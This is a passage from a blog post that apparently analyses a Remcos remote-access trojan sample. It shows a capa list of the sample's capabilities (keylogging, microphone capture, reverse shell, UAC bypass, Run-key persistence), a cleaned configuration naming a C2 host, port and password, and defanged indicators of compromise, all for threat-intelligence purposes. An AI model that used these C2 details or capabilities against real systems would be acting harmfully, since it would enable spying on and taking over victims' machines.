\n===========<\/h4>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-1024x389.png\")
<\/a><\/p>\n\r\nCapability Namespace \r\n==========================\r\ncheck for software breakpoints - anti-analysis\/anti-debugging\/debugger-detection \r\nself delete - anti-analysis\/anti-forensic\/self-deletion \r\nget geographical location - collection \r\ngather firefox profile information (2 matches) - collection\/browser \r\nlog keystrokes via application hook (2 matches) - collection\/keylog \r\nlog keystrokes via polling (3 matches) - collection\/keylog \r\ncapture microphone audio (4 matches) - collection\/microphone \r\ncapture screenshot - collection\/screenshot \r\nreceive data (7 matches) - communication \r\nsend data (2 matches) - communication \r\ncreate reverse shell - communication\/c2\/shell \r\nexecute shell command and capture output - communication\/c2\/shell \r\nresolve DNS - communication\/dns \r\ncreate two anonymous pipes - communication\/named-pipe\/create \r\ninitialize Winsock library - communication\/socket \r\nencode data using Base64 - data-manipulation\/encoding\/base64 \r\nencode data using XOR (16 matches) - data-manipulation\/encoding\/xor \r\nencrypt data using AES (3 matches) - data-manipulation\/encryption\/aes \r\nreference AES constants - data-manipulation\/encryption\/aes \r\nencrypt data using OpenSSL ECDSA - data-manipulation\/encryption\/ecdsa \r\nencrypt data using RC4 KSA - data-manipulation\/encryption\/rc4 \r\nencrypt data using RC4 PRGA - data-manipulation\/encryption\/rc4 \r\nhash data using SHA256 (2 matches) - data-manipulation\/hashing\/sha256 \r\nauthenticate HMAC - data-manipulation\/hmac \r\ngenerate random numbers via WinAPI - data-manipulation\/prng \r\ncontain a thread local storage (.tls) section - executable\/pe\/section\/tls \r\nextract resource via kernel32 functions - executable\/resource \r\nread clipboard data (5 matches) - host-interaction\/clipboard \r\nwrite clipboard data (2 matches) - host-interaction\/clipboard \r\nquery environment variable - host-interaction\/environment-variable \r\nset environment variable (2 matches) - host-interaction\/environment-variable \r\nget common file path (2 matches) - host-interaction\/file-system \r\ncopy file - host-interaction\/file-system\/copy \r\ncreate directory (5 matches) - host-interaction\/file-system\/create \r\ndelete directory (3 matches) - host-interaction\/file-system\/delete \r\ndelete file (15 matches) - host-interaction\/file-system\/delete \r\ncheck if file exists (16 matches) - host-interaction\/file-system\/exists \r\nenumerate files recursively (3 matches) - host-interaction\/file-system\/files\/list \r\nget file attributes (2 matches) - host-interaction\/file-system\/meta \r\nset file attributes (10 matches) - host-interaction\/file-system\/meta \r\nmove file (2 matches) - host-interaction\/file-system\/move \r\nread file on Windows (4 matches) - host-interaction\/file-system\/read \r\nread file via mapping - host-interaction\/file-system\/read \r\nwrite file on Windows (6 matches) - host-interaction\/file-system\/write \r\nenumerate gui resources - host-interaction\/gui \r\nchange the wallpaper - host-interaction\/gui\/session \r\nget graphical window text (4 matches) - host-interaction\/gui\/window\/get-text \r\nhide graphical window (7 matches) - host-interaction\/gui\/window\/hide \r\nget keyboard layout (2 matches) - host-interaction\/hardware\/keyboard \r\nenumerate disk volumes - host-interaction\/hardware\/storage \r\nget disk information (3 matches) - host-interaction\/hardware\/storage \r\ncheck mutex - host-interaction\/mutex \r\ncheck mutex and exit (3 matches) - host-interaction\/mutex \r\nshutdown system (2 matches) - host-interaction\/os \r\nget system information on Windows - host-interaction\/os\/info \r\ncreate process on Windows (16 matches) - host-interaction\/process\/create \r\nuse process replacement - host-interaction\/process\/inject \r\nenumerate processes (2 matches) - host-interaction\/process\/list \r\nmodify access privileges - host-interaction\/process\/modify \r\nterminate process (14 matches) - host-interaction\/process\/terminate \r\nquery or enumerate registry key (2 matches) - host-interaction\/registry \r\nquery or enumerate registry value (7 matches) - host-interaction\/registry \r\nset registry value (7 matches) - host-interaction\/registry\/create \r\ndelete registry key (2 matches) - host-interaction\/registry\/delete \r\ndelete registry value - host-interaction\/registry\/delete \r\ncontinue service - host-interaction\/service \r\npause service - host-interaction\/service \r\nquery service status - host-interaction\/service \r\nenumerate services - host-interaction\/service\/list \r\nmodify service - host-interaction\/service\/modify \r\nstart service (2 matches) - host-interaction\/service\/start \r\nstop service (2 matches) - host-interaction\/service\/stop \r\nget session user name - host-interaction\/session \r\nget installed programs - host-interaction\/software \r\ncreate thread (22 matches) - host-interaction\/thread\/create \r\nterminate thread (2 matches) - host-interaction\/thread\/terminate \r\nbypass UAC via ICMLuaUtil - host-interaction\/uac\/bypass \r\nlink many functions at runtime (2 matches) - linking\/runtime-linking \r\nlinked against CPP standard library - linking\/static \r\nenumerate PE sections - load-code\/pe \r\nparse PE header (2 matches) - load-code\/pe \r\nresolve function by parsing PE exports (6 matches) - load-code\/pe \r\npersist via Run registry key (4 matches) - persistence\/registry\/run\r\n<\/pre>\n
Host Analysis
\n=============<\/h4>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-1024x291.png\")
<\/a>For grins, I thought that I would look at Conversations<\/em> within Wireshark to see if any “odd” ports may have been used. Nope, nada.<\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-1024x357.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-1024x325.png\")
<\/a><\/p>\n\n
![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-1024x386.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-1024x290.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-1024x208.png\")
<\/a><\/p>\n![\"\"](\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-1024x367.png\")
<\/a>I have also cleaned up the config file a bit for ease of copy\/pasta.<\/p>\n\r\n\r\nC2 Host: rdm.accesscam.org\r\nPort: 6620\r\nPassword: 1\r\nBotnet: Hpp\r\nMutex: Rmc-NAGSJO\r\n\r\nrdm.accesscam.org:6620:1|Hpp|1|1|100000||8|remcos.exe|0|Rmc-NAGSJO|0|8|logs.dat|10|5|6|Screenshots|5|MicRecords||0|0|0|1|Remcos|remcos|5722EFB615BBED358FD19DBBAECDA904\r\n\r\n<\/pre>\n
IOCs
\n=====<\/h4>\n
\nURL: hxxps:\/\/textbin[.]net\/raw\/ezjmofz3s6 – [VT<\/a>] [URLHaus<\/a>]
\nURL: hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR [VT] [URLHaus]
\nURL: hxxps:\/\/paste[.]ee\/d\/WRBwK\/0 [VT<\/a>] [URLHaus]
\nDomain: rdm[.]accesscam[.]org:6620 [VT<\/a>] [URLHaus]
\nURL: geoplugin[.]net\/json.gp [VT] [URLHaus]
\nIP: 185[.]174[.]101[.]214 [VT<\/a>] [URLHaus]
\nScanned-2023Reports.vbs: b116f7ca8259e5ea9a53651a84d32ade6cb96c24a97f5d8f7eb6cb6e95a771f
\npaste.ee.exe: 288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae [VT<\/a>]
\npasteio.com.exe: c92b586ab278e4d0390629f9039182d9d012e49605db44fb90db56951693a1be<\/p>\n","protected":false},"excerpt":{"rendered":"